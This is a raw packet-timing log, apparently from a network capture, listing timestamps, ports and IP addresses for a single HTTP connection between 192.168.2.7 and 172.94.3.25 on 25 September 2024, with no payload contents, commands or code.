Sep 25, 2024 18:33:53.214967966 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.215333939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215347052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215363026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215378046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215390921 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.215420961 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215436935 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215451956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215466976 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215466976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.215466976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.215481997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215497971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215512991 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.215532064 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.215532064 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.216252089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216268063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216281891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216296911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.216296911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216312885 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216327906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216329098 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.216342926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216344118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.216360092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216375113 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216388941 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216396093 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.216403008 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216417074 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.216418028 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.216447115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.217166901 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217181921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217195034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217209101 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217223883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217232943 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.217232943 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.217237949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217252016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217267990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217283964 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217298985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217313051 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.217319012 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.217319012 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.217571020 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218063116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218079090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218094110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218108892 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218117952 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218122959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218137980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218153000 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218169928 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218169928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218169928 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218187094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218202114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218205929 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218218088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218231916 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.218274117 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218327045 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.218991995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219007015 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219022989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219038010 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219053030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219067097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219079971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219079971 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219084024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219099998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219114065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219127893 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219127893 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219131947 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219146967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219173908 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219784975 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219799042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219816923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219825983 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219835043 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219851017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219866037 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.219877005 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.219877005 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.222326994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222404003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222419977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222455025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.222455025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.222539902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222553968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222568989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222585917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222624063 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.222624063 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.222790956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222805977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222820997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.222836018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.222836971 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.223057032 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.223072052 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.223086119 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.223087072 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.223118067 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.246654987 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.322194099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322238922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322256088 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322379112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322405100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322421074 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322438002 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.322438955 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322438955 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.322474003 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.322958946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322973967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.322988987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323002100 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323014975 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323016882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323020935 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323033094 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323046923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323065042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323074102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323074102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323081970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323124886 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323467970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323482990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323498011 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323512077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323527098 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323542118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323558092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323558092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323558092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323574066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323589087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323601961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323601961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.323604107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.323669910 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.324243069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324258089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324271917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324285984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324299097 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324306965 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.324314117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324327946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324331999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.324346066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324362040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324376106 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324390888 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324390888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.324390888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.324405909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.324424028 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.324554920 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.325299025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325315952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325330019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325345993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325361013 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325362921 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.325376987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325388908 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.325396061 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325413942 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325419903 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.325431108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325445890 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325458050 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.325460911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325474977 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.325516939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.325516939 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.326122046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326137066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326152086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326168060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326181889 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326198101 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326199055 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.326211929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326231003 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326241970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.326241970 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.326246023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326261997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326277018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326292992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.326293945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.326293945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.326517105 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.327055931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327071905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327088118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327104092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327119112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327132940 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327146053 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.327146053 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.327147007 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327163935 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327179909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327186108 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.327194929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327204943 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.327209949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327224970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.327263117 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.327263117 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328041077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328058958 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328073025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328089952 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328104973 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328119993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328120947 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328120947 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328136921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328154087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328169107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328185081 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328188896 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328188896 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328198910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328213930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328227997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328243017 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328243017 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328917980 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328933954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328949928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328965902 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328978062 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328978062 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.328980923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.328996897 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329011917 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329019070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329029083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329044104 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329060078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329073906 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329090118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329090118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329090118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329133034 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329217911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329603910 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329619884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329634905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329651117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329668045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329684019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329698086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329706907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329706907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329706907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.329715967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.329777956 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.358362913 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.394541979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394582033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394603014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394620895 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394639969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394659042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394658089 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.394673109 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.394682884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394869089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394896030 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394902945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.394902945 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.394931078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394965887 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.394985914 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.395062923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.395095110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.395147085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.395153999 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.395183086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.395241976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413166046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413263083 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413268089 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413307905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413398027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413430929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413443089 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413465023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413501978 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413511992 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413537025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413554907 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413650036 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413683891 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413691998 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413856983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413899899 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.413908005 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413939953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.413973093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414011002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414019108 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414045095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414062023 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414077997 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414109945 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414141893 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414170027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414175034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414213896 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:53.414237976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414383888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:53.414644957 CEST	80	49699	172.94.3.25	192.168.2.7
